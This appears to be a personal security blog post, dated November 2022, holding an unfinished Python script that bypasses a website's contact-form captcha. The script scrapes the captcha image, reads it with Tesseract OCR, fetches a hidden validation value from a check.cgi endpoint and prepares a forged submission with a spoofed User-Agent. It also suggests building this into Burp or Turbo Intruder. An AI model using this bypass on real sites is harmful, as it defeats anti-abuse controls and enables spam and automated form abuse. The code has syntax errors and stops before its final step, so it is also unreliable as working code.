Friday, November 18, 2022

Captcha Bypass Using Tesseract OCR and Python

import cv2
import pytesseract
from urllib.request import urlopen
import numpy as np
from bs4 import BeautifulSoup
import requests
import urllib.parse
import re

#burninator August 2022

#captcha bypass: by hitting the validation check API directly PLUS using OCR AI library to read the captcha

#contact_check_page = requests.get('')

#testRegexTheCode = '/RECAPTCHACODE/RECAPTCHA.png'
#x = re.findall("[0-9]+",testRegexTheCode)

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0'}

# STEP ONE - get the recaptcha image text value first, before the .cgi check (order matters!)

#thesoupson = open('TARGET/TARGET.htm', 'r')
thesoupofcontact = requests.get('TARGET/', headers=headers) #also tested and working
thesoupson = thesoupofcontact.text
#for line in thesoupson:
#    print (str(line))

soup = BeautifulSoup(thesoupson, "html.parser")
images = soup.findAll('img')
for image in images:
    if ('recaptcha.png' in image['src']):
        print(str('target captcha ' + image['src']))
        targetCaptcha = image['src']
        recaptchaCodeMatch = re.findall("[0-9]+",targetCaptcha)
        fromRecaptchaUrl = recaptchaCodeMatch[0]


pytesseract.pytesseract.tesseract_cmd = r'C:\PROGRA~1\Tesseract-OCR\tesseract.exe' #set env vars here because... MEH!

# Loading image using OpenCV
req = urlopen('https://TARGET+targetCaptcha)
arr = np.asarray(bytearray(, dtype=np.uint8)

img = cv2.imdecode(arr, -1)

#cv2.imshow('lalala', img)
if cv2.waitKey() & 0xff == 27: quit()

#img = cv2.imread('recaptcha.png')

# Converting to text
answerToRecaptcha = pytesseract.image_to_string(img)

print(str("this is the captcha text TEEHEE!" ) + answerToRecaptcha)

#STEP TWO - get the CGI value - usually loaded from Javascript from the
#CGI request is tested and working, tho i just added that cgisouprequestvar:
cgisouprequest = requests.get('https://TARGET/check.cgi')
cgisoup = cgisouprequest.text

#cgisoup = open('TARGET/contact_check.cgi', 'r')
soupses = BeautifulSoup(cgisoup, "html.parser")
inputs = soupses.findAll('input')
for input in inputs:
    print (str(input['value']))
    thevalue = str(input['value'])


encodeme = urllib.parse.quote(thevalue, safe="")

contactCheckValue = encodeme

#STEP THREE - build out the POST request with the stuff with the two variables + that same randomized User-Agent string

# also consider building this into either a Burp extension or Turbo Intruder (most likely an extension since it allows calling python modules or other treats from the path)

